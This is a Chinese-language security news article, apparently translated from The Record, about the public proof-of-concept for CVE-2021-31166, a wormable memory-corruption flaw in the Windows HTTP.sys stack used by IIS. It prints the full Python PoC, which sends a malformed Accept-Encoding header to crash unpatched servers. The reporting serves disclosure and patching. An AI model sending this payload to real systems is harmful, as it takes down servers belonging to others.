Windows操作系統HTTP協議棧內存破壞漏洞PoC公開
5月微軟補丁日修復了一個CVSSv3評分9.8分的嚴重安全漏洞,該漏洞CVE編號為CVE-2021-31166。近日,有研究人員在GitHub上公布了該漏洞的PoC代碼。
CVE-2021-31166漏洞是Windows操作系統中HTTP 協議棧的內存破壞漏洞。該協議棧是Windows內置的IIS 服務器使用的。如果IIS 服務器啟用,攻擊者就可以發送偽造的包來在操作系統kernel上執行也代碼。微軟稱該漏洞可以被用來創建網絡蠕蟲,因此建議優先修復。
雖然該漏洞CVSS評分為9.8分,聽起來非常危險,但該漏洞只影響最新的一些Windows版本,具體影響Windows 10、Windows server 2004、Windows server 20H2的不同版本。
5月17日,安全研究人員Axel Souchet在GitHub上公開了該漏洞的PoC代碼。該PoC代碼可以使運行IIS 服務器的未修復的Windows系統奔潰,但是并沒有實現蠕蟲功能。
PoC代碼參見:https://github.com/0vercl0k/CVE-2021-31166
- import requests
- import argparse
- def main():
- parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
- parser.add_argument('--target', required = True)
- args = parser.parse_args()
- r = requests.get(f'http://{args.target}/', headers = {
- 'Accept-Encoding': 'doar-e, ftw, imo, ,',
- })
- print(r)
PoC視頻參見: https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif
本文翻譯自:https://therecord.media/poc-released-for-wormable-windows-iis-bug/如若轉載,請注明原文地址。